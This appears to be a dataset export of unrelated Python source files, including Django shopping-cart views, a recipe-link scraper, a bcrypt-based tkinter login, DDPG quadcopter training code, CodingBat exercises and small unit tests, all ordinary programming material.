text stringlengths 8 6.05M |
|---|
'''
define the type assert decorator
'''
from .exception import ArgumentLengthError, ArgumentTypeError
def argument_check(*types):
    """Decorator factory that type-checks a function's positional arguments.

    Usage::

        @argument_check(int, str)
        def f(a, b): ...

    Raises:
        ArgumentLengthError: at decoration time, when the number of declared
            types differs from the function's positional argument count.
        ArgumentTypeError: at call time, when a positional argument is not
            an instance of its declared type.
    """
    def check(f):
        # Fail fast at decoration time if the declaration is inconsistent.
        if len(types) != f.__code__.co_argcount:
            raise ArgumentLengthError(
                "expected %d types for %r, got %d" %
                (f.__code__.co_argcount, f.__name__, len(types)))
        def new_f(*args, **kwds):
            # Only positional arguments are validated (matching the original
            # contract); keyword arguments pass through unchecked.
            for index, (arg, check_type) in enumerate(zip(args, types)):
                if not isinstance(arg, check_type):
                    raise ArgumentTypeError(
                        "argument %d of %r should be %s, got %s" %
                        (index, f.__name__, check_type.__name__,
                         type(arg).__name__))
            return f(*args, **kwds)
        # Preserve basic metadata of the wrapped function.
        new_f.__name__ = f.__name__
        new_f.__doc__ = f.__doc__
        return new_f
    return check
"""
Scraper for foodnetwork.com. Collectis all recipe links from website.
Author: John Li
"""
from .scraper_base import ScraperBase
from selectolax.parser import HTMLParser
import json
import requests
import string
import re
class FoodNetwork(ScraperBase):
    """Scraper that collects recipe links from foodnetwork.com."""
    def __init__(self):
        """Load this site's base link from the config and set up the parent."""
        with open('../config/base_links.json', 'r') as config_file:
            base_links = json.load(config_file)
        site_name = 'foodnetwork'
        super().__init__(site_name, base_links[site_name])
    def parse(self):
        """Walk the alphabetical index pages and record every recipe URL."""
        # Recipe URLs contain '/recipes/' and end in a seven-digit id.
        recipe_pattern = r'.*foodnetwork\.com/recipes/.*\d{7}'
        # Recipes are indexed alphabetically, plus the '123' and 'xyz' pages.
        suffixes = list(string.ascii_lowercase) + ['123', 'xyz']
        for suffix in suffixes:
            page = requests.get(self.base_link + suffix)
            document = HTMLParser(page.text)
            for anchor in document.tags('a'):
                href = anchor.attributes.get('href', '')
                if re.fullmatch(recipe_pattern, href):
                    # Matching hrefs are presumably scheme-relative
                    # ('//www...'), hence the prepended scheme.
                    self.links.add('http:' + href)
|
#!/usr/bin/env python
import sys
import argparse
import time
from helpers import parameters as params
from methods import *
def main(args):
    """Configure the pipeline from parsed CLI arguments and run it.

    Reads the config file, stores CNV/cancer-type/output settings in the
    shared ``params`` module, resolves external tool paths, then runs the
    phasing pipeline when ``-phase`` was given.
    """
    outbamfn = args.outBamFile  # NOTE(review): assigned but never used here
    # NOTE(review): the reader is fetched *before* InitConfigReader runs; this
    # relies on GetConfigReader returning the same object that
    # InitConfigReader later populates - confirm against helpers.parameters.
    configReader = params.GetConfigReader()
    params.InitConfigReader(args.configfile)
    params.SetGainCNV(args.cnvAmpFile)
    params.SetLossCNV(args.cnvDelFile)
    params.SetCancerType(args.cancerType)
    params.SetOutputFileName(args.outBamFile)
    params.SetSplitBamsPath(args.splitbams)
    results_path = configReader.get('RESULTS', 'results_path')
    # Resolve external software paths (``bamhelp`` presumably comes from
    # ``from methods import *`` - TODO confirm; it is not defined locally).
    java_path= bamhelp.GetJavaPath()
    beagle_path= bamhelp.GetBeaglePath()
    samtools_path = bamhelp.GetSamtoolsPath()
    bedtools_path = bamhelp.GetBedtoolsPath()
    vcftools_path = bamhelp.GetVCFtoolsPath()
    sambamba_path = bamhelp.GetSambambaPath()
    params.SetSoftwarePath(java_path, beagle_path,samtools_path, bedtools_path, vcftools_path,sambamba_path)
    if( args.phase):
        run_pipeline(results_path)
if __name__ == '__main__':
    # Command-line interface; all heavy lifting happens in main().
    parser = argparse.ArgumentParser(description='adds CN spikes to reads, outputs modified reads as .bam along with mates')
    parser.add_argument('-outbam', dest='outBamFile', required=True,
                        help='.bam file name for output')
    parser.add_argument('-cnv_amp', dest='cnvAmpFile', required=False,
                        help='CNV amplification .bed file name')
    parser.add_argument('-cnv_del', dest='cnvDelFile', required=False,
                        help='CNV deletion .bed file name')
    parser.add_argument('-inbam', dest='inbamFile', required=False,
                        help='sam/bam file from which to obtain reads')
    parser.add_argument('-cancertype', dest='cancerType', required=False,
                        help='acronyms for cancer type')
    parser.add_argument('-splitbamdir', dest='splitbams', required=False,
                        help='input bam split by chromosomes')
    parser.add_argument('-c', '--configFile', action='store', required=True, dest='configfile',
                        help='/path/to/config_file.cfg')
    parser.add_argument('-phase', dest='phase', action="store_true")
    args = parser.parse_args()
    t0 = time.time()
    main(args)
    t1 = time.time()
    # The end timestamp used to be computed but discarded; report the
    # wall-clock runtime on stderr so stdout stays clean for pipelines.
    sys.stderr.write('Elapsed time: %.2f seconds\n' % (t1 - t0))
#!/usr/bin/env python
import rospy
import smach
import smach_ros
from std_msgs.msg import Int32
from std_msgs.msg import String
import game_setting
import actionlib
from sound_play.msg import SoundRequest, SoundRequestAction, SoundRequestGoal
from watson_developer_cloud import TextToSpeechV1
import roslib; roslib.load_manifest('sound_play')
import os
import json
from sets import Set
class GameSystem:
    """ROS-facing helper: publishes game events and plays sound files.

    NOTE(review): this module is Python 2 (print statement below, and the
    module imports ``sets.Set``); do not run under Python 3 without porting.
    """
    def __init__(self):
        # Publishers toward the game front-end / other nodes.
        self.pub_rotate = rospy.Publisher('rotate', String, queue_size=10)
        self.pub_rotate_result = rospy.Publisher('rotate_result', String, queue_size=10)
        self.pub_function = rospy.Publisher('function_card', String, queue_size=10)
        # Action client for the sound_play server.
        self.client = actionlib.SimpleActionClient('sound_play', SoundRequestAction)
        # Card names by index; index 0 is the empty card.
        self.cards = ['','camera','glasses','helicopter','phone','guitar','axe','kite','crayon','rose','scissors','FrenchFries','skateboard']
        # Audio files live in <package root>/sysAudio/.
        self.soundPath = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) + "/sysAudio/"
    def spin(self):
        """Publish a rotate trigger (payload 'X')."""
        msg = String()
        msg.data = 'X'
        self.pub_rotate.publish(msg)
    def spin_result(self, state, result):
        """Publish the rotation outcome as the concatenation '<state><result>'."""
        msg = String()
        s = ''
        s += state
        s += str(result)
        msg.data = s
        self.pub_rotate_result.publish(msg)
    def function_card(self,idx):
        """Publish the card at *idx* to Unity, then pause briefly."""
        msg = String()
        msg.data = self.cards[idx]
        self.pub_function.publish(msg)
        rospy.sleep(1.5)
    def speak(self, audioPath):
        """Play <soundPath>/<audioPath>.wav via the sound_play action server."""
        self.client.wait_for_server()
        try:
            goal = SoundRequestGoal()
            goal.sound_request.sound = SoundRequest.PLAY_FILE
            goal.sound_request.command = SoundRequest.PLAY_ONCE
            goal.sound_request.arg = self.soundPath + audioPath + ".wav"
            goal.sound_request.volume = 1.0
            self.client.send_goal(goal)
            self.client.wait_for_result()
        except:
            # NOTE(review): bare except, and the message is garbled
            # ("print <name>fails"); kept byte-identical in this doc-only pass.
            print "print " + audioPath + "fails"
|
import jsonpickle
from django.http import JsonResponse
from django.shortcuts import render, redirect
from django.views import View
from django_redis import get_redis_connection
from goods.models import GoodsSKU
# Create your views here.
class CartAdd(View):
    '''Add an item to the cart (AJAX endpoint).'''
    def post(self, request):
        """Add *count* units of *sku_id* to the logged-in user's Redis cart.

        Response codes: 0 not logged in, 1 missing params, 2 bad count,
        3 unknown product, 4 insufficient stock, 5 success.
        """
        # Require a logged-in user (the session stores a jsonpickle'd user).
        if 'user' not in request.session:
            return JsonResponse({'res': 0, 'errmsg': '请先登录'})
        user = jsonpickle.loads(request.session.get('user'))
        # Extract parameters.
        sku_id = request.POST.get('sku_id')
        count = request.POST.get('count')
        # Both parameters are required.
        if not all([sku_id, count]):
            return JsonResponse({'res': 1, 'errmsg': '信息不完整'})
        # Count must be an integer.
        try:
            count = int(count)
        except Exception as e:
            return JsonResponse({'res': 2, 'errmsg': '数目出错'})
        # The product must exist.
        try:
            sku = GoodsSKU.objects.get(id=sku_id)
        except GoodsSKU.DoesNotExist:
            return JsonResponse({'res': 3, 'errmsg': '商品不存在'})
        # Read the quantity already in the cart (per-user Redis hash).
        con = get_redis_connection('default')
        cart_key = 'cart_%d' % user.id
        cart_count = con.hget(cart_key, sku_id)
        # Accumulate with the existing quantity.
        if cart_count:
            count += int(cart_count)
        # Stock check on the accumulated total.
        if count > sku.stock:
            return JsonResponse({'res': 4, 'errmsg': '库存不足'})
        # Store the new quantity.
        con.hset(cart_key, sku_id, count)
        # hlen counts *distinct* SKUs in the cart, not total quantity.
        total_count = con.hlen(cart_key)
        return JsonResponse({'res': 5, 'message': '添加成功', 'total_count': total_count})
class CartInfo(View):
    '''Cart detail page.'''
    def get(self, request):
        """Render cart.html with all cart entries and their totals."""
        # Anonymous users are sent to the login page.
        if 'user' not in request.session:
            return redirect('/user/login/')
        user = jsonpickle.loads(request.session.get('user'))
        # Fetch every sku_id -> count pair from the user's Redis cart hash.
        con = get_redis_connection('default')
        cart_key = 'cart_%d' % user.id
        cart_dict = con.hgetall(cart_key)
        skus = []
        total_count = 0
        total_price = 0
        for sku_id, count in cart_dict.items():
            # Load the product row.
            sku = GoodsSKU.objects.get(id=sku_id)
            # Normalise the stored count to int.
            count = int(count)
            # Line subtotal.
            amount = count * sku.price
            # Attach count dynamically for the template.
            sku.count = count
            # Attach the subtotal dynamically for the template.
            sku.amount = amount
            skus.append(sku)
            # Running total of items...
            total_count += count
            # ...and of price.
            total_price += amount
        # Build the template context.
        context = {
            'skus': skus,
            'total_count': total_count,
            'total_price': total_price,
        }
        return render(request, 'cart.html', context)
class CartUpdate(View):
    '''Update the quantity of one cart entry (AJAX endpoint).'''
    def post(self, request):
        """Overwrite the stored quantity of *sku_id* with *count*.

        Response codes: 0 not logged in, 1 missing params, 2 bad count,
        3 unknown product, 4 insufficient stock, 5 success.
        """
        # Reject anonymous users.
        if 'user' not in request.session:
            return JsonResponse({'res': 0, 'errmsg': '请先登录'})
        user = jsonpickle.loads(request.session.get('user'))
        # Extract and validate parameters.
        sku_id = request.POST.get('sku_id')
        count = request.POST.get('count')
        if not all([sku_id, count]):
            return JsonResponse({'res': 1, 'errmsg': '信息不完整'})
        try:
            count = int(count)
        except Exception:
            return JsonResponse({'res': 2, 'errmsg': '数目异常'})
        try:
            sku = GoodsSKU.objects.get(id=sku_id)
        except GoodsSKU.DoesNotExist:
            return JsonResponse({'res': 3, 'errmsg': '无此商品'})
        if count > sku.stock:
            return JsonResponse({'res': 4, 'errmsg': '库存不足'})
        # Overwrite (not accumulate) the quantity for this SKU.
        redis_conn = get_redis_connection('default')
        redis_conn.hset('cart_%d' % user.id, sku_id, count)
        return JsonResponse({'res': 5, 'message': '添加成功'})
class CartDelete(View):
    '''Remove one SKU from the cart (AJAX endpoint).'''
    def post(self, request):
        """Delete *sku_id* from the logged-in user's Redis cart hash.

        Response codes: 0 not logged in, 1 missing id, 2 unknown product,
        3 success. The success payload now uses the 'message' key - it was
        'errmsg', inconsistent with the other cart views' success responses.
        """
        if 'user' not in request.session:
            return JsonResponse({'res': 0, 'errmsg': '请先登录'})
        user = jsonpickle.loads(request.session.get('user'))
        # Validate input.
        sku_id = request.POST.get('sku_id')
        if not sku_id:
            return JsonResponse({'res': 1, 'errmsg': '无效的商品ID'})
        # Existence check only; the row itself is not needed afterwards.
        try:
            GoodsSKU.objects.get(id=sku_id)
        except GoodsSKU.DoesNotExist:
            return JsonResponse({'res': 2, 'errmsg': '无此商品'})
        # Remove the hash field for this SKU.
        con = get_redis_connection('default')
        cart_key = 'cart_%d' % user.id
        con.hdel(cart_key, sku_id)
        return JsonResponse({'res': 3, 'message': '删除成功'})
|
def array123(nums):
    """Return True if the values 1, 2, 3 appear consecutively in nums."""
    for idx in range(2, len(nums)):
        if (nums[idx - 2], nums[idx - 1], nums[idx]) == (1, 2, 3):
            return True
    return False
def array_front9(nums):
    """Return True if 9 appears among the first four elements of nums."""
    return any(value == 9 for value in nums[:4])
def array_count9(nums):
    """Return how many times the value 9 occurs in nums."""
    return sum(1 for value in nums if value == 9)
def string_splosion(str):
    """Return the concatenation of every non-empty prefix of *str*.

    string_splosion('Code') -> 'CCoCodCode'

    NOTE: the parameter name shadows the built-in ``str``; it is kept so
    existing keyword callers do not break. The stray trailing semicolon and
    the recursive delegation were replaced by a direct join.
    """
    return ''.join(str[:length] for length in range(1, len(str) + 1))
def string_splosion2(str, int):
    """Recursive helper kept for backward compatibility: concatenates the
    prefixes of *str* of lengths *int* .. len(str). Parameter names shadow
    built-ins but are preserved for interface compatibility.
    """
    if len(str) <= int:
        return str
    return str[0:int] + string_splosion2(str, int + 1)
#Codingbat python warmup 2 problems
#Tried BubbleSort
import random
def bubblesort(iarr):
    """Bubble-sort *iarr* in place (ascending) and return it.

    Prints the list once per pass, mirroring the original debug output.
    """
    swapped = True
    while swapped:
        swapped = False
        for pos in range(len(iarr) - 1):
            if iarr[pos] > iarr[pos + 1]:
                iarr[pos], iarr[pos + 1] = iarr[pos + 1], iarr[pos]
                swapped = True
        print(iarr)
    return iarr
# Demo: sort five random two-digit numbers and print the result.
array1 = [random.randint(0, 99) for _ in range(5)]
# Preserve the loop counter's final value for any later reference.
integer = 5
print(bubblesort(array1))
# -*- coding: utf-8 -*-
# Generated by Django 1.11.1 on 2017-06-03 23:40
from __future__ import unicode_literals
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated (Django 1.11.1): tightens CreditCard field definitions -
    expiry month/year choice lists, a digits-only card-number validator, and
    the owner field's verbose name. Do not hand-edit generated values."""
    dependencies = [
        ('userprofiles', '0006_auto_20170521_1919'),
    ]
    operations = [
        migrations.AlterField(
            model_name='creditcard',
            name='due_month',
            field=models.CharField(choices=[('01', '01'), ('02', '02'), ('03', '03'), ('04', '04'), ('05', '05'), ('06', '06'), ('07', '07'), ('08', '08'), ('09', '09'), ('10', '10'), ('11', '11'), ('12', '12')], max_length=2, verbose_name='Mes'),
        ),
        migrations.AlterField(
            model_name='creditcard',
            name='due_year',
            field=models.CharField(choices=[('17', '17'), ('18', '18'), ('19', '19'), ('20', '20'), ('21', '21'), ('22', '22'), ('23', '23'), ('24', '24'), ('25', '25'), ('26', '26'), ('27', '27'), ('28', '28'), ('29', '29'), ('30', '30'), ('31', '31'), ('32', '32'), ('33', '33'), ('34', '34'), ('35', '35'), ('36', '36'), ('37', '37'), ('38', '38'), ('39', '39'), ('40', '40'), ('41', '41'), ('42', '42'), ('43', '43'), ('44', '44')], max_length=2, verbose_name='Año'),
        ),
        migrations.AlterField(
            model_name='creditcard',
            name='number',
            field=models.CharField(max_length=19, unique=True, validators=[django.core.validators.RegexValidator('^\\d{1,19}$')], verbose_name='Numero de tarjeta'),
        ),
        migrations.AlterField(
            model_name='creditcard',
            name='owner',
            field=models.CharField(max_length=45, verbose_name='Dueño'),
        ),
    ]
|
import unittest
import contracts
from VM import VM
class VNTestCase(unittest.TestCase):
    """Placeholder suite for the VM/contracts modules: no tests yet."""
    pass
if __name__ == "__main__":
    # Run (currently empty) test discovery when executed directly.
    unittest.main()
|
import tkinter as tk
from tkinter import ttk
from tkinter import *
import bcrypt
import sqlite3
from tkinter import messagebox as mb
from MenuPrincipal import Menu
class Ingreso:
    """Login window: authenticates a user against the ``empleados`` table in
    the SQLite database and opens the main menu on success."""
    def __init__(self, ventanaPrincipal):
        self.auxiliar=False
        # Create the login window on top of the main window.
        self.ventanaLogin = tk.Toplevel(ventanaPrincipal)
        self.ventanaLogin.title("Login")
        self.ventanaLogin.geometry("400x300")
        self.frameTitulo=ttk.Label(self.ventanaLogin, text="Luxury")
        #self.frameTitulo.place(x=150, y=15, width=250, height=40)
        self.frameTitulo.pack(anchor=CENTER)
        self.frameTitulo.config(foreground="black",font=("times",24))
        #self.ventanaLogin.configure(bg='black')
        self.ventanaLogin.resizable(0,0)
        self.center(self.ventanaLogin)
        self.labelFrameLogin=ttk.LabelFrame(self.ventanaLogin, text="Login:")
        self.labelFrameLogin.place(x=55, y=60, width=300, height=150)
        # Initially empty label, used later for error feedback.
        self.labelLogin = tk.Label(self.ventanaLogin, text = "")
        self.labelLogin.place(x=90, y=200, width=200, height=105)
        # Username label and entry.
        self.labelUsuario = ttk.Label(self.labelFrameLogin, text="Usuario o Email: ")
        self.labelUsuario.grid(column=1, row=1, padx=4, pady=4)
        self.labelUsuario.configure(foreground="black")
        self.datoUsuario=tk.StringVar()
        self.inputUsuario=ttk.Entry(self.labelFrameLogin, width=15, textvariable=self.datoUsuario)
        self.inputUsuario.grid(column=2, row=1, padx=4, pady=4)
        # Password label and masked entry.
        self.labelPass = ttk.Label(self.labelFrameLogin, text="Password: ")
        self.labelPass.grid(column=1, row=2, padx=4, pady=4)
        self.labelPass.configure(foreground="black")
        self.datoPassword=tk.StringVar()
        self.inputPassword=ttk.Entry(self.labelFrameLogin, width=15, textvariable=self.datoPassword, show="*")
        self.inputPassword.grid(column=2, row=2, padx=4, pady=4)
        # Login button.
        self.botonIngresar=tk.Button(self.labelFrameLogin, text="Ingresar", command=lambda: self.LogicaLogin(ventanaPrincipal), background="#1BFF00", activebackground="#29DC13")
        self.botonIngresar.place(x=40, y=80, width=70, height=40)
        # Exit button.
        self.botonSalir=tk.Button(self.labelFrameLogin, text="Salir", command=self.Close_VentanaLogin, background="#FF0000", activebackground="#E91212")
        self.botonSalir.place(x=120, y=80, width=70, height=40)
        # Make the login window modal.
        self.ventanaLogin.grab_set()
        #self.ventanaLogin.mainloop()
    def LogicaLogin(self,ventanaPrincipal):
        """Validate the entered credentials; on success open the main menu,
        otherwise display an error message in red."""
        self.correoInput = self.datoUsuario.get()
        self.contraseñaInput = self.datoPassword.get()
        self.contraseñaInput = self.contraseñaInput.encode()
        # Parameterized query - safe against SQL injection.
        self.conexion= sqlite3.connect('empleadosDB.db')
        self.cursor=self.conexion.cursor()
        self.cursor.execute("SELECT usuario, email, contraseña FROM empleados WHERE usuario=? OR email=?",(self.correoInput, self.correoInput))
        self.datos=self.cursor.fetchone()
        # NOTE(review): bcrypt.checkpw assumes the stored hash (datos[2]) is
        # bytes - confirm how the hash is written at registration time.
        if(self.datos and ((self.correoInput == self.datos[0] or self.correoInput == self.datos[1]) and bcrypt.checkpw(self.contraseñaInput, self.datos[2]))):
            menu = Menu()
            #mb.showinfo("Bienvenido", "Bienvenido al sistema de Administracion Hotelera Luxury")
            self.ventanaLogin.destroy()
            ventanaPrincipal.destroy()
            menu.Inicio()
        else:
            self.labelLogin["text"]="Los datos ingresados son incorrectos"
            self.labelLogin.configure(fg="red")
    def Close_VentanaLogin(self):
        """Close the login window without logging in."""
        self.ventanaLogin.destroy()
    def center(self,win):
        """Center the window *win* on the screen."""
        win.update_idletasks()
        width = win.winfo_width()
        height = win.winfo_height()
        x = (win.winfo_screenwidth() // 2) - (width // 2)
        y = (win.winfo_screenheight() // 2) - (height // 2)
        win.geometry('{}x{}+{}+{}'.format(width, height, x, y))
#login = Ingreso()
#login.FrontLogin(" ","") |
base_url = "https://eb-fp-test:8101" # set url |
#!/usr/bin/env python3
import rospy
import time
import numpy as np
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
import random
import argparse
#from tensorflow import keras
from tensorflow.compat.v1.keras.models import model_from_json, Model,load_model
from tensorflow.compat.v1.keras.models import Sequential
from tensorflow.compat.v1.keras.layers import Dense, Dropout, Activation, Flatten
from tensorflow.compat.v1.keras.optimizers import Adam
import tensorflow.compat.v1 as tf
import os
import json
import pdb
import argparse
from Replay_Buffer import Replay_Buffer
from Actor_Network import Actor_Network
from Critic_Network import Critic_Network
import tensorflow.compat.v1.keras.backend as K
import myquadcopter_env as environment
tf.disable_v2_behavior()
timestr = time.strftime("%Y%m%d-%H%M%S")
save_path = 'saved_models_' + timestr
def ou_func(x, mu, theta, sigma=0.3):
    """Ornstein-Uhlenbeck exploration noise.

    Returns a 1-element numpy array: a drift term pulling *x* toward *mu*
    (scaled by *theta*) plus Gaussian noise scaled by *sigma*.
    """
    drift = theta * (mu - x)
    diffusion = sigma * np.random.randn(1)
    return drift + diffusion
def train_quad(debug=True):
    """Train a DDPG actor/critic pair on the custom quadcopter environment.

    Runs ``eps_count`` episodes of at most ``max_steps`` steps, adding
    OU exploration noise (annealed via ``epsilon``), training from a replay
    buffer each step, saving models every 50 episodes, and live-plotting the
    per-episode total reward.
    """
    env = environment.QuadCopterEnv(debug) # Rohit's custom environment
    obs_dim = env.num_states
    act_dim = env.num_actions
    # Hyperparameters (buffer_size/batch_size/tau are presumably consumed
    # inside Replay_Buffer / the networks - they are unused locally).
    buffer_size = 5000
    batch_size = 32
    gamma = 0.98
    tau = 0.001
    np.random.seed(1337)
    vision = False
    explore = 1000 #100000
    eps_count = 500 #1000
    max_steps = 40 #100000
    reward = 0
    done = False
    epsilon = 1
    indicator = 0
    plot_state = False
    plot_reward = True
    episode_rewards = []
    episode = []
    # Configure tensorflow: force CPU (no GPUs requested).
    config = tf.ConfigProto(
        device_count = {'GPU': 0}
    )
    sess = tf.Session(config=config)
    #from tensorflow.keras import backend as K
    #K.set_session(sess)
    tf.compat.v1.keras.backend.set_session(
        sess
    )
    # Define actor, critic and replay buffer.
    actor = Actor_Network(env, sess)
    critic = Critic_Network(env, sess)
    replay_buffer = Replay_Buffer()
    # Save location; note this chdir's into the save directory.
    save_dir = os.path.join(os.getcwd(), save_path)
    if not os.path.isdir(save_dir):
        os.makedirs(save_dir)
    os.chdir(save_dir)
    # Set up the live training-curve plot.
    plt.ion()
    plt.title('Training Curve')
    plt.xlabel('Episodes')
    plt.ylabel('Total Reward')
    plt.grid()
    # Episode loop
    for epi in range (eps_count):
        # Receive initial observation state
        s_t = env.reset() # Initial position info
        s_t = np.asarray(s_t)
        total_reward = 0
        done = False
        step = 0
        # Step loop
        while(done == False):
            if step > max_steps: # NOTE(review): comment said 200, cap is max_steps (40)
                break
            step += 1
            if debug:
                print('--------------------------------')
                print('step: {}'.format(step))
            loss = 0
            epsilon -= 1.0/explore # Anneal exploration every step
            a_t = np.zeros([1, act_dim])
            noise_t = np.zeros([1, act_dim])
            # Select action according to current policy plus exploration noise
            a_t_original = actor.model.predict(s_t.reshape(1, s_t.shape[0]))
            print('epsilon: {}'.format(epsilon))
            #noise_t[0][0] = max(epsilon,0.0) * ou_func(a_t_original[0][0], 0.0 , 0.60, 1)
            #noise_t[0][1] = max(epsilon,0.0) * ou_func(a_t_original[0][1], 0.0 , 0.60, 1)
            #noise_t[0][2] = max(epsilon,0.0) * ou_func(a_t_original[0][2], 0.0 , 0.60, 1)
            noise_t[0][0] = max(epsilon,0.0) * ou_func(a_t_original[0][0], 0.0 , 0.1, 0.4)
            noise_t[0][1] = max(epsilon,0.0) * ou_func(a_t_original[0][1], 0.0 , 0.1, 0.4)
            noise_t[0][2] = max(epsilon,0.0) * ou_func(a_t_original[0][2], 0.0 , 0.1, 0.4)
            a_t[0][0] = a_t_original[0][0] + noise_t[0][0]
            a_t[0][1] = a_t_original[0][1] + noise_t[0][1]
            #a_t[0][2] = a_t_original[0][2] + noise_t[0][2]
            a_t[0][2] = 0
            s_t1, r_t, done, _ = env.step(a_t[0])
            s_t1 = np.asarray(s_t1)
            # Add current transition to the replay buffer
            replay_buffer.add(s_t, a_t[0], r_t, s_t1, done)
            # Sample a training batch from the replay buffer
            batch = replay_buffer.sample_batch()
            states = np.asarray([e[0] for e in batch])
            actions = np.asarray([e[1] for e in batch])
            rewards = np.asarray([e[2] for e in batch])
            new_states = np.asarray([e[3] for e in batch])
            dones = np.asarray([e[4] for e in batch])
            y_t = np.asarray([e[1] for e in batch]) # Placeholder array with the right shape
            # Target Q values from the target critic/actor networks
            target_q_values = critic.target_model.predict([new_states, actor.target_model.predict(new_states)])
            # y_t holds the TD targets (reward only at terminal transitions)
            for k in range (len(batch)):
                if dones[k]:
                    y_t[k] = rewards[k]
                else:
                    y_t[k] = rewards[k] + gamma*target_q_values[k]
            # Train critic on the TD targets
            loss += critic.model.train_on_batch([states, actions], y_t)
            a_for_grad = actor.model.predict(states)
            grads = critic.gradients(states, a_for_grad)
            actor.train(states, grads)
            actor.target_train()
            critic.target_train()
            total_reward += r_t
            s_t = s_t1
        # Episode finished: periodically save models
        if ((epi+1)%50 == 0):
            a_model_name = '%d_actor_model.h5' %(epi+1)
            c_model_name = '%d_critic_model.h5' %(epi+1)
            filepath = os.path.join(save_dir, a_model_name)
            actor.model.save(a_model_name)
            critic.model.save(c_model_name)
        print('episode: {}, num_steps: {}, total rewards: {:.2f}, final state: ({:.2f},{:.2f},{:.2f})'.format(epi+1, step, total_reward, s_t[0], s_t[1], s_t[2]))
        if plot_reward:
            episode_rewards.append(total_reward)
            episode.append(epi+1)
            plt.plot(episode, episode_rewards, 'b')
            plt.pause(0.001)
    plt.savefig("Training Curve.png")
import signal, sys
def signal_handler(signum, frame):
    """SIGINT handler: shut down the ROS node, then exit cleanly.

    The first parameter was renamed from ``signal`` to ``signum`` because it
    shadowed the ``signal`` module inside the handler body.
    """
    reason = 'Because'
    rospy.signal_shutdown(reason)
    sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
if __name__ == "__main__":
    # ROS signals are disabled because SIGINT is handled by signal_handler above.
    rospy.init_node('quad_training', anonymous=True, disable_signals=True)
    debug = 1  # truthy -> verbose per-step logging inside train_quad
    train_quad(debug)
|
from django.db import models
# Create your models here.
class jobListing(models.Model):
    """A job posting with a free-text title and description.

    NOTE(review): the class name is lowerCamelCase rather than PascalCase;
    renaming would require a migration, so it is left as-is.
    """
    title = models.TextField(null=True,blank=True)
    description = models.TextField(null=True,blank=True)
|
# coding: utf-8
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
from made_bitree import TreeNode
class Solution(object):
    def isValidBST(self, root):
        """Return True if *root* is a valid binary search tree.

        Every value in a node's left subtree must be strictly smaller than
        the node's value and every value in its right subtree strictly
        larger (equal values count as invalid, as in the original).

        :type root: TreeNode
        :rtype: bool
        """
        if not root:
            return True
        def check(node):
            # Returns (subtree_min, subtree_max, is_valid). The previous
            # version dropped the right subtree's max (and the left
            # subtree's min) when recombining, so a tree like
            # 10 -> left 5 -> right 15 was wrongly accepted; both bounds
            # are propagated correctly here.
            lo = hi = node.val
            if node.left:
                left_lo, left_hi, ok = check(node.left)
                if not ok or left_hi >= node.val:
                    return None, None, False
                lo = left_lo
            if node.right:
                right_lo, right_hi, ok = check(node.right)
                if not ok or right_lo <= node.val:
                    return None, None, False
                hi = right_hi
            return lo, hi, True
        return check(root)[2]
# Build the sample tree from its serialized form (made_bitree's TreeNode
# presumably parses the "{...}" level-order string - TODO confirm) and
# print whether it is a valid BST.
tree = TreeNode("{10,5,15,#,#,6,20}")
# tree = TreeNode("{5, 14, 1}")
obj = Solution()
print(obj.isValidBST(tree))
|
#!/usr/bin/env python
class HelloWord:
    """Collects words and prints them joined by spaces.

    The word list used to be a *class* attribute, so every new instance
    appended to the same shared list and the printed greeting grew with
    each instantiation; it is now per-instance state.
    """
    def __init__(self):
        self.tab = []
        self.add_tab("Script Python")
        self.add_tab("Hello")
        self.add_tab("Word")
        self.toString()
    def add_tab(self, val):
        """Append *val* to this instance's word list."""
        self.tab.append(val)
    def toString(self):
        """Print the collected words separated by single spaces."""
        print(' '.join(map(str, self.tab)) )
inst = HelloWord()
|
'''
Created on 3Nov.,2016
@author: u76345
'''
import sys
import os
from jetcat2argus import JetCat2Argus
def main():
    """CLI entry point: load a JetCat file and print combined Argus records.

    Expects exactly four arguments: jetcat_path, db_alias, db_user and
    db_password; exits with a usage/error message otherwise. ``assert`` was
    replaced with explicit checks because asserts are stripped under ``-O``.
    """
    if len(sys.argv) != 5:
        sys.exit('Usage: %s <jetcat_path> <db_alias> <db_user> <db_password>' % sys.argv[0])
    jetcat_path = sys.argv[1]
    db_alias = sys.argv[2]
    db_user = sys.argv[3]
    db_password = sys.argv[4]
    if not os.path.isfile(jetcat_path):
        sys.exit('%s is not a valid file' % jetcat_path)
    j2a = JetCat2Argus(jetcat_path, db_alias, db_user, db_password)
    j2a.print_combined_records()
if __name__ == '__main__':
    main()
import random
from datetime import datetime
from unittest import mock, TestCase
import pytest
import responses
from freezegun import freeze_time
from libtrustbridge.websub.repos import NotificationsRepo, DeliveryOutboxRepo, SubscriptionsRepo
from api.models import Message, MessageStatus
from api.use_cases import (
PublishStatusChangeUseCase, DispatchMessageToSubscribersUseCase, DeliverCallbackUseCase, NewMessagesNotifyUseCase
)
class TestGetNewMessagesUseCase:
    """Tests for NewMessagesNotifyUseCase (AU jurisdiction) using the real
    DB session plus channel/notifications repos supplied by fixtures."""
    @pytest.fixture(autouse=True)
    def message(self, request, db_session, clean_channel_repo, clean_notifications_repo):
        # Seed four messages: three at 12:04:01 (two for AU, one for SG) and
        # one for SG at 12:04:03; message1 is revoked in the second commit,
        # which presumably bumps its updated_at to the later timestamp.
        self.db_session = db_session
        self.message1 = Message(payload={"receiver": "AU"})
        self.message2 = Message(payload={"receiver": "AU"})
        with freeze_time('2020-06-17 12:04:01.111111'):
            messages = [
                self.message1,
                self.message2,
                Message(payload={"receiver": "SG"}),
            ]
            for m in messages:
                self.db_session.add(m)
            self.db_session.commit()
        with freeze_time('2020-06-17 12:04:03.111111'):
            messages = [
                Message(payload={"receiver": "SG"}),
            ]
            for m in messages:
                self.db_session.add(m)
            self.message1.status = MessageStatus.REVOKED
            self.db_session.commit()
        self.channel_repo = clean_channel_repo
        self.notifications_repo = clean_notifications_repo
        self.use_case = NewMessagesNotifyUseCase('AU', clean_channel_repo, clean_notifications_repo)
    def test_get_new_messages__when_available__should_return_them(self):
        # Only message1 (revoked, hence updated at 12:04:03) is newer than `now`.
        now = datetime(2020, 6, 17, 12, 4, 1, 222222)
        messages = self.use_case.get_new_messages(receiver='AU', since=now)
        assert len(messages) == 1
        assert messages[0].updated_at >= now
